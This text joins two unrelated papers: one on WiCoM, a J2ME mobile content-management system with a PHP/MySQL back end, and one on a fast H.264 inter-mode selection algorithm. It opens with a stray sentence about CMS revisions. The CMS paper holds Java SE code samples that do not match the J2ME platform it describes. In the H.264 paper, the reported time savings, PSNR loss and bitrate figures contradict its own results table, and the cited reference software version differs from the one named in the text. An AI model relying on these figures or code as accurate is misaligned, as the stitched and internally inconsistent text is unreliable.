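A production CMS would store revisions in a database table with author and timestamp columns, but the append-only discipline is the same.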
WiCoM is a wireless application aimed at helping the general administration of cyber content while on the move. It is wireless cyber content management software running on a Java-enabled mobile device with GPRS connectivity, and finds application in news reporting agencies for administering a news site in real time.

A reporter arriving at the site of an event can record news of the current scenario from various sources. He can take snapshots, audio and video and upload them right at the moment to the web server, making them available to the world in no time. There are options to edit and delete content, providing various content-management features. A modified version could also be useful for e-commerce and online shopping sites.
II. RELATED WORK
The integrated Content Management System (CMS) is a robust, easy-to-use web content manager built upon a flexible application framework developed using inexpensive, open-source resources. It enables users to collaborate easily on creating and maintaining web-site content, and establishes the contractual relationships between the roles of web-site developers, graphic designers, and managers, ensuring quality and integrity of content at all times.

Such a CMS is suitable for just about any web-site model: news publications, customer support interfaces, Web portals, communities, project-management sites, intranets, and extranets. Features include role definitions and workflow customizability, integrated searchable help, a clean modular system for extending the administrative interface, front-end content editing, embedding components into pages, email distribution lists, a news application, discussion forums, and much more. Planned enhancements include content syndication and aggregation, advanced role definitions, and further workflow customizability and modules. The CMS currently requires PHP and Apache. It has been tested on Linux and Windows environments, and while not currently supported, it should run on Mac OS X as well. The system natively runs on a MySQL database; however, using the integrated database abstraction layer, it is possible to use most popular database systems, including Oracle, InterBase, MySQL and MS SQL Server.
III. DEVELOPMENT ENVIRONMENT
The Integrated Development Environment (IDE) chosen was NetBeans 6.0, an open-source project developed to provide a vendor-neutral IDE for software development. This ran on top of Java SDK 1.4.2_12, which implements functionality that aids in the development of J2ME applications. This functionality includes full integration of the Java Wireless Toolkit, which provides configurations and profiles for mobile development. The plug-in also integrates the MIDP 2.0 emulator provided with the Wireless Toolkit, which can then be launched from within NetBeans 6.0.
Figure 1: Data flow diagram
IV. SYSTEM STRUCTURE
The structure of the system is divided into two components:
The client-side MIDlet application, which resides on the mobile phone.
The server-side PHP/MySQL based application.
1. Client Side
The client-side system is a MIDlet application which serves as an interface to feed in the content and control instructions; these are interpreted on the server, where the appropriate action is taken. The MIDlet has the tasks of creating textual news content, creating media content, and editing and updating textual news content. News creation is done through a data-entry interface containing various sections to be filled in. Once done, the data is uploaded to the server and stored in the database.

Media news capture is the most important section of the MIDlet application. It has options to capture pictures, audio and video on devices that support it. These media can then be uploaded to the server and stored in a particular directory structure. Another important section of the MIDlet is the News Manager, i.e., the section that helps edit and update news content posted earlier. It has a search option to find the relevant news item and then make a change to it; once the change is confirmed, it is updated in the database on the server.
Figure 2: Communication between MIDlet and server application
2. Server Side
The server-side system comprises a web server, Apache; the scripts are PHP-based, while the back-end database server is MySQL. The news content and control instructions sent by the MIDlet client are received at the server end and processed by the respective PHP script.

The PHP scripts that handle the MIDlet interaction perform various database queries and also generate the XML-based data consumed by the MIDlet; they are likewise responsible for storing the media data properly. The use of XML eases the generation of data for consumption by the MIDlet. The user interface is a simple web interface which displays news content fetched from the server according to the chosen criteria, while the admin interface serves to administer the news content from the desktop.
V. COMMUNICATION
Wireless content management is a client-server system; the information flow is not standalone but goes through the network, and hence a communication medium is needed. J2ME MIDlets can operate over, and make use of, the WAP stack to perform HTTP network interaction without requiring TCP/IP. Since the server application resides on a remote machine, a connection must be established between the mobile device and the remote server, which is accomplished using phones with GPRS connectivity.
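On the MIDlet side the request itself travels over the Generic Connection Framework's HttpConnection, but the payload is ordinary URL-encoded HTTP form data. A minimal sketch in standard Java of encoding such parameters (the field names are illustrative, not the actual WiCoM protocol):

```java
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;

public class ParamEncoder {
    // Build an application/x-www-form-urlencoded string of the kind a
    // MIDlet would POST to the server-side PHP script over GPRS.
    static String encode(String[][] params) {
        StringBuilder sb = new StringBuilder();
        try {
            for (String[] p : params) {
                if (sb.length() > 0) sb.append('&');
                sb.append(URLEncoder.encode(p[0], "UTF-8"))
                  .append('=')
                  .append(URLEncoder.encode(p[1], "UTF-8"));
            }
        } catch (UnsupportedEncodingException e) {
            throw new RuntimeException(e); // UTF-8 is always available
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        System.out.println(encode(new String[][] {
            {"action", "create"}, {"title", "Flood in the city"}
        }));
        // prints: action=create&title=Flood+in+the+city
    }
}
```

On MIDP itself the encoding would be done by hand (CLDC lacks java.net.URLEncoder), but the wire format is identical.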
VI. SYSTEM IMPLEMENTATION
The application's workflow begins in the MIDlet, which is the source of news-content input. When the MIDlet is opened, a welcome screen appears, followed by a login form. The login form is important because the system will be used for administration and requires entry into a restricted area of the web site.

Once the user is properly authenticated, the main menu becomes visible and the user can perform the required operations. Once the data is filled in completely, the upload
button can be pressed to bring up the next screen, where the data is confirmed. Once done, we can send the data to the server by pressing the start button.
Media creation handles the production of multimedia files such as pictures, audio and video. The camera is initialized using the Mobile Media API (MMAPI, JSR 135). Once a file is created, it is transferred over HTTP to the remote server as multipart/form-data.
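The multipart/form-data wire format is simple enough to assemble by hand, which is what a MIDlet without a helper library must do. A minimal sketch (boundary and field names are illustrative; a real upload would write the raw media bytes, not a String):

```java
public class MultipartBuilder {
    // Assemble a minimal multipart/form-data body around one file part,
    // following the part layout defined by RFC 2388.
    static String build(String boundary, String fieldName,
                        String fileName, String contentType, String data) {
        return "--" + boundary + "\r\n"
             + "Content-Disposition: form-data; name=\"" + fieldName
             + "\"; filename=\"" + fileName + "\"\r\n"
             + "Content-Type: " + contentType + "\r\n\r\n"
             + data + "\r\n"
             + "--" + boundary + "--\r\n";
    }

    public static void main(String[] args) {
        System.out.print(build("----wicomBoundary", "media",
                               "snap.jpg", "image/jpeg", "<jpeg bytes here>"));
    }
}
```

The same boundary string must also appear in the request's Content-Type header (`multipart/form-data; boundary=...`) so the PHP script can split the parts.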
The News Manager, i.e., the editing and updating section of the application, is one of its most important parts. When the update section is opened, the user is presented with a screen where he can enter a search keyword as well as the search type, such as title, news text or author name. The search is then performed on the server, and all results matching the criteria are fetched. Since the mobile screen is small, the data is broken into segments of five full news items each; each segment is transmitted from the server to the MIDlet in XML format. When more pages exist, the News Manager offers an extra command, "NEXT", to jump to the next page; otherwise the option is not shown.
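The five-per-segment paging with a conditional NEXT command can be sketched as follows (a simplification of the behaviour described above; the names are our own):

```java
import java.util.Arrays;
import java.util.List;

public class NewsPager {
    // Five full news items per segment, as described above.
    static final int PAGE_SIZE = 5;

    // Items belonging to one page (0-based page numbers).
    static <T> List<T> page(List<T> items, int pageNo) {
        int from = Math.min(pageNo * PAGE_SIZE, items.size());
        int to = Math.min(from + PAGE_SIZE, items.size());
        return items.subList(from, to);
    }

    // The MIDlet shows the NEXT command only when more pages exist.
    static boolean hasNext(int totalItems, int pageNo) {
        return (pageNo + 1) * PAGE_SIZE < totalItems;
    }

    public static void main(String[] args) {
        List<Integer> ids = Arrays.asList(1, 2, 3, 4, 5, 6, 7);
        System.out.println(page(ids, 0));           // [1, 2, 3, 4, 5]
        System.out.println(page(ids, 1));           // [6, 7]
        System.out.println(hasNext(ids.size(), 0)); // true
        System.out.println(hasNext(ids.size(), 1)); // false
    }
}
```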
XML handling relies on the kXML parser, a low-footprint XML parser for mobile devices. The client application discussed above was tested on the emulator provided by the J2ME Wireless Toolkit version 2.2, using Java SDK 1.4.2_12.
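kXML exposes a pull-parsing API; Java SE's built-in StAX parser works the same way, so the client's handling of a server response can be illustrated without the J2ME toolchain (the element names below are assumed, not the actual WiCoM schema):

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public class NewsFeedParser {
    // Pull-parse a news segment, collecting the text of every <title>.
    static List<String> titles(String xml) {
        List<String> out = new ArrayList<>();
        try {
            XMLStreamReader r = XMLInputFactory.newInstance()
                    .createXMLStreamReader(new StringReader(xml));
            while (r.hasNext()) {
                if (r.next() == XMLStreamConstants.START_ELEMENT
                        && r.getLocalName().equals("title")) {
                    out.add(r.getElementText());
                }
            }
        } catch (XMLStreamException e) {
            throw new RuntimeException(e);
        }
        return out;
    }

    public static void main(String[] args) {
        String xml = "<news><item><title>Flood</title></item>"
                   + "<item><title>Election</title></item></news>";
        System.out.println(titles(xml)); // [Flood, Election]
    }
}
```

With kXML the loop is near-identical, using XmlPullParser's next()/getName()/nextText() in place of the StAX calls.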
Alongside the client-server system working between the mobile device and the server, there is another, mobile-independent, web-based part of the application: the website that allows users to browse the various news items.

There is also an admin interface for managing certain features of the news, such as activating or deactivating items for viewing, and deleting them. In addition, a PHP installation script allows the user to configure the server side of the application and set it up properly with ease. The server side is implemented using PHP 5.2 as the language and MySQL 4.1 as the database server, with Apache 2.0.8 (for Windows) as the web server.
VII. SYSTEM DESIGN AND RESULT ANALYSIS
1. Server Modules
1) User Registration: User Registration provides the screens for registering new users who will upload messages to the server. The registration form collects information from the user such as first name, last name, user name and password. New users are informed of any errors they make while filling in the form. If the required information is supplied, the registration is confirmed with a "registration successful" message.

2) Message Creator: Message Creator provides the screens for creating messages on the web server via the web interface. Users can apply different styles, as in a word processor, when creating a text multimedia message, and can upload their audio and image files through this module.

3) Message Viewer: Message Viewer is used to view the uploaded messages on the main page of the server site. The messages are arranged in descending order of upload time, with the attached image. Each message title links to a separate page for viewing the full message.
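The newest-first ordering of the Message Viewer is a single descending sort on upload time. An illustrative sketch (the Message class is our own stand-in, not the actual server schema, where the ordering would be done with an SQL ORDER BY clause):

```java
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;

public class MessageViewer {
    // Stand-in for one row of the messages table (illustrative only).
    static class Message {
        final String title;
        final long uploadTime; // e.g. a Unix timestamp

        Message(String title, long uploadTime) {
            this.title = title;
            this.uploadTime = uploadTime;
        }
    }

    // Newest first, as on the server's main page.
    static void sortNewestFirst(List<Message> msgs) {
        msgs.sort(Comparator.comparingLong((Message m) -> m.uploadTime).reversed());
    }

    public static void main(String[] args) {
        List<Message> msgs = new ArrayList<>();
        msgs.add(new Message("old", 100));
        msgs.add(new Message("new", 300));
        msgs.add(new Message("mid", 200));
        sortNewestFirst(msgs);
        for (Message m : msgs) System.out.println(m.title);
        // prints: new, mid, old (one per line)
    }
}
```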
2. Client Modules
1) Message Creator: Message Creator is used to create a message on the mobile phone. The module is divided into three sub-modules, namely Text Message Creator, Multimedia Content Creator and Message Uploader, described below.

Text Message Creator has the form for entering the message title, content, place and category information. If the specified message category already exists on the server, the uploaded message is placed under that category on the server web site.

Multimedia Content Creator has the forms for capturing an image with the mobile phone camera and recording audio with the mobile phone microphone. The captured image is stored locally on the mobile in JPEG format; the recorded audio is stored in MP3 format.
2) Message Uploader: The Message Uploader is used to upload the text and multimedia content to the server. The module has a form which shows the progress of the upload using a Gauge control. The text message has the higher priority, so it is uploaded first, and the multimedia content afterwards. The module also has a menu option for saving the uploaded message locally, with its attachment.
3) RSS Reader: The RSS Reader module is used to view the contents of the server. The messages on the server are arranged under message categories, and this form displays the categories on the mobile screen. The message titles are displayed when the user selects a category, and the full message, without the attachment, is displayed when the user selects a message title.
4) Message Editor: Message Editor is used to edit previously stored messages and upload the edited messages to the server. If created messages have already been stored, a new menu item named "Saved Items" appears on the main menu; it is used to traverse the previously stored messages.
5) Configurator: The Configurator has a form to collect the User Name, Password and Server URL. This form is displayed as the first page when the user runs the software for the first time. The information can later be modified via the "Edit Data" menu.
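The upload-priority behaviour described in the Message Uploader module above (the text part goes first, multimedia attachments follow) can be sketched as below. This is an illustrative Python sketch of the ordering policy only, not the paper's J2ME implementation; all field names and the example data are assumptions.

```python
# Hypothetical sketch of the uploader's ordering policy: the text part of a
# message is queued before its multimedia attachments, mirroring the
# "text has higher priority" rule described above.

def build_upload_queue(message):
    """Return upload jobs in priority order: text first, then attachments."""
    jobs = [{"kind": "text",
             "fields": {"title": message["title"],
                        "content": message["content"],
                        "place": message["place"],
                        "category": message["category"]}}]
    # Multimedia parts (JPEG image, MP3 audio) follow the text message.
    for path in message.get("attachments", []):
        jobs.append({"kind": "multimedia", "file": path})
    return jobs

msg = {"title": "Road closure", "content": "Bridge repair in progress",
       "place": "Durg", "category": "Traffic",
       "attachments": ["photo.jpg", "note.mp3"]}
queue = build_upload_queue(msg)
print([j["kind"] for j in queue])   # the text part is always first
```

A real client would then POST each job in this order, updating the Gauge control as each transfer completes.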
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
Figure 3. J2ME Display
VIII. CONCLUSION
In this paper we have presented a multimedia application developed using Java Micro Edition on the client and PHP/MySQL on the server side. The use of XML was a good choice keeping in mind the future scope of the project. The application is one of its kind and finds wide application in news reporting agencies and e-commerce sites. An advanced version of the application, a more generalized mobile CMS eligible for large-scale deployment, is in progress.
More functions can be added to the prototype design to support game content, animation content and movie content. The CMS can also be extended to CDMA technology to support various groups of mobile phones. In the future, content could be downloaded from the server to the client device for later offline use.
Enhanced Mode Selection Algorithm for the H.264 Encoder for Application in Low Computational Power Devices
Sourabh Rungta, CSE Department, RCET, Durg, India. E-mail: sourabh@rungta.org
Kshitij Verma, ABV-IIITM, Gwalior, India. E-mail: vermaksh@gmail.com
Neeta Tripathi, ECE Department, RSRCET, Durg, India. E-mail: neeta_31dec@rediffmail.com
Anupam Shukla, ICT Department, ABV-IIITM, Gwalior, India. E-mail: dranupamshukla@gmail.com
Abstract— The intent of the H.264/AVC project was to
create a standard capable of providing good video
quality at substantially lower bit rates than previous
standards without increasing the complexity of design so
much that it would be impractical or excessively
expensive to implement. An additional goal was to
provide enough flexibility to allow the standard to be
applied to a wide variety of applications. To achieve
better coding efficiency, H.264/AVC uses several
techniques such as inter mode and intra mode prediction with variable-size motion compensation, adopting Rate Distortion Optimization (RDO). This increases the computational complexity of the encoder, especially for devices with lower processing capabilities such as mobile and other handheld devices. In this paper, we propose an algorithm to reduce the number of mode and sub-mode evaluations in inter mode prediction. Experimental results show that this fast inter mode selection algorithm can reduce encoding time by about 75% with little loss of bit rate and visual quality.
Keywords: H.264, RDO, Inter-Frame Prediction, Sub-Mode Selection.
I INTRODUCTION
H.264 is the emerging video coding standard with enhanced compression performance compared to other existing coding standards. To achieve outstanding coding performance, H.264/AVC employs several powerful coding techniques such as the 4x4 integer transform, inter-prediction with variable block-size motion compensation, motion vectors of quarter-pel accuracy, an in-loop deblocking filter, improved entropy coding such as context-adaptive variable-length coding (CAVLC) and context-adaptive binary arithmetic coding (CABAC), enhanced intra-prediction, multiple reference pictures, and so forth. Due to these new features, encoder computational complexity is greatly increased compared to previous standards. This makes H.264/AVC difficult to use in applications with low computational capabilities (such as mobile devices). Thus, to date, the reduction of its complexity remains a challenging task in H.264/AVC.
As recent multimedia applications (using various types of
networks) are growing rapidly, video compression requires
higher performance as well as new features. H.264 emerged
as the video coding standard with enhanced video
compression performance when compared to other existing
coding standards. It outperforms the existing standards
typically by a factor of two. Its excellent performance is
achieved at the expense of the heavy computational load in
the encoder. H.264/AVC has gained more and more
attention, mainly due to its high coding efficiency (average bitrate savings of up to 50% compared to H.263+ and MPEG-4 Simple Profile), minor increase in decoder complexity compared to existing standards, adaptation to delay constraints (the low-delay mode), error robustness, and network friendliness.
H.264/AVC employs several powerful coding techniques
such as 4x4 integer transform, inter-prediction with variable
block-size motion compensation, quarter-pel-accurate motion vectors, an in-loop deblocking filter, improved entropy coding such as context-adaptive variable-length coding (CAVLC) and context-adaptive binary arithmetic coding (CABAC), enhanced intra-prediction, multiple reference pictures, and so forth. Note that the DCT coefficients of intra-frames are transformed from intra prediction residuals instead of directly from the original image content. In particular, for inter-frame prediction, H.264 allows blocks of variable size: seven modes of different sizes in all, namely 16x16, 16x8, 8x16, 8x8, 8x4, 4x8 and 4x4, can be used in inter-frame motion estimation/compensation. These block sizes form a one- or two-level hierarchy inside a macroblock and are supported along with the SKIP mode [1], as shown in Figure 1. Hence the computational complexity of motion estimation increases considerably compared with previous standards. This is one major bottleneck for the H.264 encoder.
Figure 1. Macroblock and sub-macroblock partitions.
H.264 supports various intra-mode and inter-mode prediction techniques, most of which contribute to the coding efficiency. The Lagrangian RDO method is used to select, between intra and inter prediction, the coding mode with the highest coding efficiency [4]. For inter prediction, tree-structured multi-block sizes, i.e. seven modes with different block sizes, are supported by this standard. H.264 tests the encoding process with all possible inter-coding modes and calculates their RD costs to choose the mode having the minimum cost. The RDO technique involves a large amount of computation: the reference implementation [7] of H.264 uses a brute-force search for inter mode selection, which is extremely computationally demanding. There is therefore an obvious need to reduce the number of modes that are evaluated in order to speed up the encoding and hence reduce the complexity of the encoder.
II INTRA- AND INTER-FRAME SELECTION
The two coding modes in H.264 are intra-frame coding and inter-frame coding. Intra-frame coding supports two classes, denoted Intra4x4 and Intra16x16. When subsequent frames of the video sequence differ considerably (such as in the case of a scene change), intra-frame coding [1] is selected. In order to achieve outstanding coding performance, many advanced techniques are used. Among these, intra mode plays a vital role because it can eliminate spatial redundancy remarkably well. In the luma component, intra prediction is applied for each 4x4 block and for the 16x16 macroblock. There are 9 modes for a 4x4 luma block, 4 modes for a 16x16 luma block and 4 modes for an 8x8 chroma block. To obtain the best coding performance, a very time-consuming technique named RDO (rate-distortion optimization) is used. It computes the real bit-rate and the distortion between the original and reconstructed frames for each mode, then calculates the RD cost based on the Lagrangian rate-distortion formula. The mode with the minimum RD cost is chosen as the final coding mode. The computational load of this kind of exhaustive search algorithm is therefore not acceptable for real-time applications.
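The mode counts above make clear why exhaustive RDO is costly. A back-of-the-envelope count of full rate-distortion evaluations for the luma component of one macroblock, using only the figures quoted in the text (this is a rough illustration, not the exact JM search count):

```python
# Count of intra-luma RDO evaluations per macroblock, from the mode counts
# quoted above: 9 modes per 4x4 block, 4 modes per 16x16 macroblock.

MODES_4x4, MODES_16x16 = 9, 4
BLOCKS_4x4_PER_MB = 16          # a 16x16 macroblock holds 16 4x4 blocks

luma_evals = BLOCKS_4x4_PER_MB * MODES_4x4 + MODES_16x16
print(luma_evals)               # 148 full RD evaluations, luma alone
```

Each of these evaluations involves a full encode-reconstruct-measure cycle, which is what makes the exhaustive search impractical on low-power devices.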
Inter prediction uses block-based motion compensation and creates a prediction model from one or more previously encoded video frames or fields. Encoding a motion vector for each partition can cost a significant number of bits, especially if small partition sizes are chosen. Motion vectors for neighboring partitions are often highly correlated, so each motion vector is predicted from vectors of nearby, previously coded partitions. A predicted vector, MVp, is formed based on previously calculated motion vectors, and MVD, the difference between the current vector and the predicted vector, is encoded and transmitted. The method of forming the prediction MVp depends on the motion compensation partition size and on the availability of nearby vectors. H.264 supports a range of block sizes (from 16x16 down to 4x4) and fine sub-sample motion vectors (quarter-sample resolution) which are not supported by earlier standards. Inter-frame selection supports the following modes: SKIP, 16x16, 16x8, 8x16, 8x8, 8x4, 4x8 and 4x4. The mode decision is made by choosing the mode having minimum RDO cost [2].
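The MVp/MVD scheme just described can be sketched as follows. For most partition sizes H.264 forms MVp as the component-wise median of the left (A), top (B) and top-right (C) neighbour vectors; the vectors below are made-up numbers for illustration.

```python
# Simplified sketch of motion-vector prediction: only the residual
# MVD = MV - MVp is transmitted, exploiting neighbour correlation.

def median_mv(a, b, c):
    """Component-wise median of three motion vectors (x, y)."""
    return tuple(sorted(comp)[1] for comp in zip(a, b, c))

mv_a, mv_b, mv_c = (4, -2), (6, 0), (5, -1)    # neighbour vectors (illustrative)
mv_cur = (7, -1)                               # vector found by motion search

mvp = median_mv(mv_a, mv_b, mv_c)              # predicted vector
mvd = (mv_cur[0] - mvp[0], mv_cur[1] - mvp[1]) # residual actually coded
print(mvp, mvd)
```

Because neighbouring vectors are correlated, MVD is usually small and cheap to entropy-code, which is exactly why small partitions (each carrying its own vector) are affordable at all.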
J(s, c, MODE|λ_MODE) = SSD(s, c, MODE|QP) + λ_MODE × R(s, c, MODE|QP)

where J(s, c, MODE|λ_MODE) represents the mode cost, QP denotes the Quantization Parameter, λ_MODE is the Lagrange multiplier [4] for mode decision, and MODE indicates a mode chosen from the set of potential macroblock modes {SKIP, 16x16, 16x8, 8x16, 8x8, 8x4, 4x8, 4x4, Intra_4x4, Intra_16x16}. SSD represents the Sum of Squared Differences between the original block s and its reconstruction c:

SSD(s, c, MODE|QP) = Σ (Sy[x, y] − Cy[x, y, MODE|QP])² + Σ (Su[x, y] − Cu[x, y, MODE|QP])² + Σ (Sv[x, y] − Cv[x, y, MODE|QP])²

where Cy[x, y, MODE|QP] and Sy[x, y] represent the reconstructed and original luminance values, Cu, Cv and Su, Sv indicate the corresponding chrominance values, and R(s, c, MODE|QP) is the number of bits associated with choosing MODE, including the bits for the macroblock header, the motion information, and all DCT coefficients.
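The Lagrangian selection above amounts to evaluating J for every candidate mode and keeping the minimum. A minimal sketch, where the per-mode SSD values, bit counts and the λ value are made-up numbers for illustration:

```python
# Minimal sketch of the Lagrangian mode decision: cost J = SSD + lambda * R,
# and the minimum-cost mode wins.

def rd_cost(ssd, rate_bits, lam):
    return ssd + lam * rate_bits

# Hypothetical per-mode (SSD, bits) measurements for one macroblock.
candidates = {"SKIP": (5200, 1), "16x16": (3100, 42),
              "8x8": (2500, 96), "Intra_4x4": (2300, 150)}
lam = 20.0  # Lagrange multiplier; a real encoder derives it from QP

best = min(candidates, key=lambda m: rd_cost(*candidates[m], lam))
print(best)
```

Note the trade-off the multiplier encodes: 8x8 and Intra_4x4 have lower distortion here, but their higher bit cost makes 16x16 the cheapest overall choice at this λ.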
III THE PROPOSED IMPROVEMENT OF THE FAST INTER-MODE SELECTION ALGORITHM FOR H.264
The proposed algorithm, as shown in Figure 2, first checks the skip condition and then makes the decision between the Class 16 and Class 8 modes based on two factors: homogeneity and temporal movement [8]. Once the class is decided, the sub-mode selection algorithm [7] is used within that class to decide the best mode among the sub-modes.
Decision I: Compute the MB difference ∆ for the current macroblock. If ∆ is very large (∆ > Ψ_inter), then intra mode selection is preferred.
Decision II: In this decision we first check the condition for the SKIP mode. If the current 16x16 block has no movement, i.e. ∆ = 0 or ∆ ≤ Ψ_SKIP, then SKIP mode is the best mode.
Decision III: Once SKIP is ruled out, we make a decision between the Class 16 and Class 8 modes. Here we check the homogeneity of the block: if the macroblock is homogeneous then Class 16 is chosen, else Class 8 is chosen. The homogeneity of the macroblock is determined by Probability Based Macroblock Mode Selection.
Let P denote the probability of the current MB. A cut set is used to determine the category to which the current MB belongs. Because we can obtain the probability of all modes, which are computed dynamically every frame, we let this cut set equal the probability of an LMB.
CorrectRatio is the probability that the MB classification predicts the same optimal encoding mode obtained from exhaustive mode selection, HMBErrRatio reflects the probability of HMBs being mistakenly categorized as LMBs, while LMBErrRatio reflects the probability of LMBs being mistakenly categorized as HMBs. Compared with the classification accuracy ratio of FMMS, our algorithm shows robustness over all kinds of sequences with different motion and other features.
Decision IV: An MB is determined to be an LMB when the weighted sum is lower than the threshold, and if it is higher than the minimum threshold, the MB is determined to be a true HMB. Otherwise, we need to further classify its motion character. Here a motion classifier is then used to determine whether the MB contains complex or simple motion information. By combining the two types of classifiers, each MB can be efficiently assigned to different mode and motion search paths, which significantly reduces the encoder complexity of H.264 for all types of content. Our fast mode decision algorithm consists of the following steps:
Step 1: If the MB is in the first row or column of a frame, test all possible modes, select the best one, then exit.
Step 2: Each MB is categorized by the probability classifier. If the predicted mode is included in the HMBs, go to Step 4; otherwise, go to Step 3.
Step 3: Check modes INTER8x16 and INTER16x8. Go to Step 9.
Step 4: For a B picture, calculate the RD cost of direct mode. If it is lower than the threshold, defined as the minimum of the neighboring MBs, skip all other modes and go to Step 11. Otherwise, if the predicted mode is included in the TRUE HMBs, go to Step 10; otherwise go to Step 5.
Step 5: Categorize the MB with the motion classifier. If it has complex motion content, go to Step 6; otherwise, go to Step 8.
Step 6: Check modes INTER8x8, INTER8x4, INTER4x8 and INTER4x4. If more than two sub-macroblock modes are not INTER8x8, go to Step 9; otherwise, go to Step 7.
Step 7: Check modes INTER16x16, INTER16x8 and INTER8x16. If any mode cost is more than that of INTER8x8, or all three modes have been tried, go to Step 11.
Step 8: Check modes INTER16x16 and INTER16x8; if cost16x16 < cost16x8, go to Step 9. Otherwise, check all the other inter modes.
Step 9: Check INTRA16x16 and INTRA4x4.
Step 10: Check INTER16x16 and INTER8x8.
Step 11: Record the best MB mode and the minimum RD cost.
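The classifier-driven pruning in the steps above can be summarized as a control-flow sketch. The probability and motion classifiers are stubbed out as boolean inputs (a real encoder computes them per macroblock), and the returned mode groups are abridged; this illustrates how classification shrinks the candidate set rather than reproducing the full algorithm.

```python
# Simplified control-flow sketch of the fast mode decision steps.
# Returns the list of mode groups actually evaluated for one MB.

def modes_to_test(first_row_or_col, is_hmb, is_true_hmb, complex_motion):
    if first_row_or_col:                       # Step 1: no neighbours yet
        return ["ALL"]
    if not is_hmb:                             # Steps 2-3: low-motion MB
        return ["INTER8x16", "INTER16x8", "INTRA"]
    if is_true_hmb:                            # Step 4 -> Step 10
        return ["INTER16x16", "INTER8x8"]
    if complex_motion:                         # Steps 5-6: small partitions
        return ["INTER8x8-subtypes", "INTRA"]
    return ["INTER16x16", "INTER16x8"]         # Step 8 path (abridged)

print(modes_to_test(False, True, False, True))
```

In every branch except the border case, only a fraction of the ten-mode candidate set is evaluated with full RDO, which is where the encoding-time saving comes from.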
Figure 2: Decision diagram (if the decision is yes, move to the left branch, else move to the right branch). Decision I compares the MB difference Δ with the intra threshold, Decision II tests the SKIP condition, Decision III chooses between Class 16 (16x16, 16x8, 8x16) and Class 8 (8x8, 8x4, 4x8, 4x4) via the homogeneity test, and Decision IV invokes the sub-mode selection algorithm within the chosen class. (Δ: MB difference; Ψ: threshold.)
IV EXPERIMENTAL RESULTS
The H.264 reference software JM8.6 [7] is used as the platform for evaluating the performance of the improved algorithm. We selected four representative QCIF video sequences, i.e. Container, Foreman, Salesman and Coastguard, as our test sequences.
TABLE I. SIMULATION PARAMETERS

MV Search Range: 16
GOP: IPPP
Codec: JM 8.6
QP: 28, 32, 36, 40
ProfileIDC: 66, 30
Hadamard Transform: Used
Entropy Coding Method: CAVLC
Size: QCIF
Threshold set for Homogeneity: 16x16: 20000; 8x8: 5000

TABLE II. SIMULATION RESULTS FOR IPPP TYPE SEQUENCES

Video Sequence        | ΔTime (%) | ΔPSNR (dB) | ΔRate (%)
container_qcif.yuv    |   -86.69  |   -0.04    |   0.40
salesman_qcif.yuv     |   -77.16  |   -0.03    |   0.91
foreman_qcif.yuv      |   -69.50  |   -0.10    |   1.38
coastguard_qcif.yuv   |   -62.63  |   -0.07    |   1.22
The test conditions [12] are shown in Table I. We used four Quantization Parameters while conducting the experiments on the test sequences, i.e. QP = 28, QP = 32, QP = 36 and QP = 40.
The coding parameters used to evaluate the efficiency are the change of coding time ΔT, the change of average PSNR ΔPSNR, and the change of average data bits ΔBitrate. T_ref is the coding time used by the JM8.6 encoder, and T_proposed is the time taken by the proposed algorithm. ΔT% is defined as

ΔT% = (T_proposed − T_ref) / T_ref × 100.

The experimental results are shown in Table II. From Table II, it is evident that the proposed algorithm reduces the encoding time for all four test sequences. Compared with the coding time of the JM8.6 encoder, the coding time reduces by 88.92% for slow-motion videos, whereas it reduces by 70.1% for fast-motion videos. The PSNR degradation is up to 0.04 dB, which is invisible to the human eye, and the data bits increase by up to 0.93%.
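As a quick arithmetic check, the per-sequence ΔTime figures reported in Table II average to roughly the "about 75%" saving quoted in the conclusion:

```python
# Average encoding-time saving over the four test sequences of Table II.

dt = {"container": -86.69, "salesman": -77.16,
      "foreman": -69.50, "coastguard": -62.63}
avg_saving = -sum(dt.values()) / len(dt)
print(round(avg_saving, 1))   # roughly 74% average time reduction
```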
V CONCLUSION
In this paper we proposed a fast inter mode selection algorithm based on the homogeneous and temporally stationary characteristics of the video object, together with a procedure to select the best sub-mode. Verified on fast-, mild- and slow-motion sequences, our method reduces the computational complexity of the H.264/AVC encoder by choosing the best mode judiciously. The average time reduction is about 75% for IPPP sequences. Moreover, our algorithm maintains the video quality without a significant bit-rate penalty. It is helpful for real-time implementation of the H.264 encoder and useful for low-power video coding applications.
VI REFERENCES
[1] T. Wiegand, G. J. Sullivan, G. Bjøntegaard and A. Luthra, "Overview of the H.264/AVC Video Coding Standard."
[2] Y. Cheng, K. Dai, J. Guo, Z. Wang and M. Xiao, "Research on Intra Modes for Inter-Frame Coding in H.264," Proceedings of the 9th International Conference on Computer Supported Cooperative Work in Design.
[3] I. E. G. Richardson, H.264 and MPEG-4 Video Compression, Wiley, 2004.
[4] J. Lee and B. Jeon, "Fast Mode Decision for H.264 with Variable Motion Block Sizes," Springer-Verlag, LNCS 2869, pp. 723-730, 2003.
[5] I. E. G. Richardson, Video Codec Design, Wiley, 2002.
[6] Z. Zhou and M.-T. Sun, "Fast Macroblock Inter Mode Decision and Motion Estimation for H.264/MPEG-4 AVC," Proceedings of the IEEE International Conference on Image Processing, ICIP 2004, Singapore, pp. 789-792, 2004.
[7] H.264 Reference Software Version JM6.1d, http://bs.hhi.de/~suehring/tml/, March 2003.
[8] M. Jafari (Islamic Azad University) and S. Kasaei (Sharif University of Technology), "Fast Intra- and Inter-Prediction Mode Decision in H.264 Advanced Video Coding."
[9] D. Wu, S. Wu, K. P. Lim, F. Pan, Z. G. Li and X. Lin, "Block Inter Mode Decision for Fast Encoding of H.264," Institute for Infocomm Research (I2R), Agency for Science, Technology and Research (A*STAR).
[10] I. Richardson and Y. Zhao, "Video Encoder Complexity Reduction by Estimating Skip Mode Distortion," Proceedings of the IEEE International Conference on Image Processing, ICIP 2004, Singapore, pp. 103-106, 2004.
[11] K. Yu, J. Lv, J. Li and S. Li, "Practical Real-Time Video Codec for Mobile Devices," Proceedings of the 2003 IEEE International Conference on Multimedia and Expo, ICME 2003, USA, pp. 509-512, 2003.
[12] G. Sullivan, "Recommended Simulation Common Conditions for H.26L Coding Efficiency Experiments on Low Resolution Progressive Scan Source Material," VCEG-N81, 14th meeting, Santa Barbara, USA, Sept. 2001.
